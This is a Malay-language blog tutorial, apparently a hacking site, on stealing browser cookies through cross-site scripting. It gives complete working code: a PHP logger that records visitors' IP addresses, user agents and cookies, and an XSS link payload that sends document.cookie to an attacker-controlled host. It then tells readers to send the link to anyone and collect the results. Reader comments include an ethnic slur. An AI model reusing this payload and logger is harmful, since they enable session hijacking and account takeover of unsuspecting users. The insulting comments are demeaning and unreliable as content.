cara mencuri Cookies menggunakan XSS


tutorial ini adalah cara untuk mencuri biskut, atau mengambil biskut dari user yang klik pada website yang vulnerable kepada xss attack . XSS juga dikenali sebagai Cross site scripting . yang terdapat pada "web Application".Jika korang ingin menbaca dengan lebih lanjut , korang boleh rujuk pada link di bawah :

http://en.wikipedia.org/wiki/Cross-site_scripting
mari kita mulakan dengan tutorial untuk mencuri biskut .

Pertama anda perlu sediakan dua file :


apasahaja.php
log.txt


upload kedua-dua file tersebut kedalam webhosting .

ok . kita perlu dapatkan target . jika korang sudah dapatkan target ,korang boleh masukan code ini , untuk mengetahui sama ada target boleh di exploit atau tidak .

Code :


<script>alert("test")</script>

Ok. Mari belajar cara untuk Cuir biskut mengunakan Xss .

Pertama sekali korang masukan php code ini di dalam "apasaja.php"


<?php 

function GetIP()
{
 if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
  $ip = getenv("HTTP_CLIENT_IP");
 else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
  $ip = getenv("HTTP_X_FORWARDED_FOR");
 else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
  $ip = getenv("REMOTE_ADDR");
 else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
  $ip = $_SERVER['REMOTE_ADDR'];
 else
  $ip = "unknown";
 return($ip);
}

function logData()
{
 $ipLog="log.txt";
 $cookie = $_SERVER['QUERY_STRING'];
 $register_globals = (bool) ini_get('register_gobals');
 if ($register_globals) $ip = getenv('REMOTE_ADDR');
 else $ip = GetIP();

 $rem_port = $_SERVER['REMOTE_PORT'];
 $user_agent = $_SERVER['HTTP_USER_AGENT'];
 $rqst_method = $_SERVER['METHOD'];
 $rem_host = $_SERVER['REMOTE_HOST'];
 $referer = $_SERVER['HTTP_REFERER'];
 $date=date ("l dS of F Y h:i:s A");
 $log=fopen("$ipLog", "a+");

 if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
  fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
 else
  fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
 fclose($log);
}

logData();

?>

dan save as.php .

script di atas akan merekod cookies user yang view link xss itu tadi .

Sebagai contoh , target kita adalah "http://google.com".
Jadi link yang vulnerable kepada xss adalah http://google.com/search_q=xss

Jadi yang korang perlu lakukan adalah :

Http://google.com/search_q="><script language= "JavaScript">document.location="http://yoursite.com/apasaja.php?cookie=" + document.cookie;document.location="http://google.com/"</script>

untuk mendapatkan cookies . Sila serahkan link xss korang kepada sesiapa sahaja seperti di atas ,
Sila buka log file korang , yang korang sertakan dengan apasahaja tadi ,
dan hasilnya korang akan dapat seperti dibawah :


IP: 125.16.48.169 | PORT: 56840 | HOST:  |  Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD:  | REF: http://google.com/search |  

Sila fahami konsep di atas , dan ambil exploit yang telah diberikan .

Jika korang nak tahu google dork mengenai Xss korang boleh rujuk link dibawah :

http://h4ckingtutors.blogspot.com/2012/07/hacking-xss-dork-repost.html

Itu sahaja . Enjoy

Incoming search :
Apakah Itu Xss
xss cookies stealing


Share this article :
Labels:

+ comments + 3 comments

Reply
Anonymous
April 18, 2013 at 10:15 PM

NICE INFO Gan
Bermanfaat banget niee :)

Reply
Anonymous
April 17, 2014 at 1:43 PM

ndk jlas lu jadi orang

Reply
Anonymous
April 17, 2019 at 7:37 PM

Malaysia anjingk

Post a Comment

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Dirty Conectionn.Indonesi4.Com - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger